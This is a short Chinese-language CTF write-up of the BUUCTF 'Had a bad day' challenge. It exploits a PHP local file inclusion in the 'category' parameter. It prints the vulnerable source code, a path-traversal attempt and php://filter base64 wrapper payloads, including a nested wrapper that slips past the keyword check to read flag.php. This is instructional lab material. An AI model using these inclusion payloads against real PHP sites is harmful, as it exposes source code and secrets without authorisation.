BUUCTF-[BSidesCF 2020]Had a bad day(文件包含)

打开靶机,有2个按钮
BUUCTF-[BSidesCF 2020]Had a bad day(文件包含)
点击按钮,url会发生变化
BUUCTF-[BSidesCF 2020]Had a bad day(文件包含)

尝试利用php://filter伪协议获取index.php源码

php://filter/read=convert.base64-encode/resource=index.php

BUUCTF-[BSidesCF 2020]Had a bad day(文件包含)
报错,去掉后缀
进行base64 decode,得到index.php:

<?php
	$file = $_GET['category'];
	if(isset($file)){
		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index"))
		{
			include ($file . '.php');
		}
		else{
			echo "Sorry, we currently only support woofers and meowers.";
		}
	}
?>

直接读flag.php,?category=woofers/../flag,页面没啥变化,F12
发现源码中有多出东西,说明flag.php确实是成功包含了
BUUCTF-[BSidesCF 2020]Had a bad day(文件包含)


!!!php://filter伪协议嵌套,套一层要求的$file
php://filter/read=convert.base64-encode/woofers/resource=flag

上一篇:Lesson 6 smash-and-grab


下一篇:TPO6-1Powering the Industrial Revolution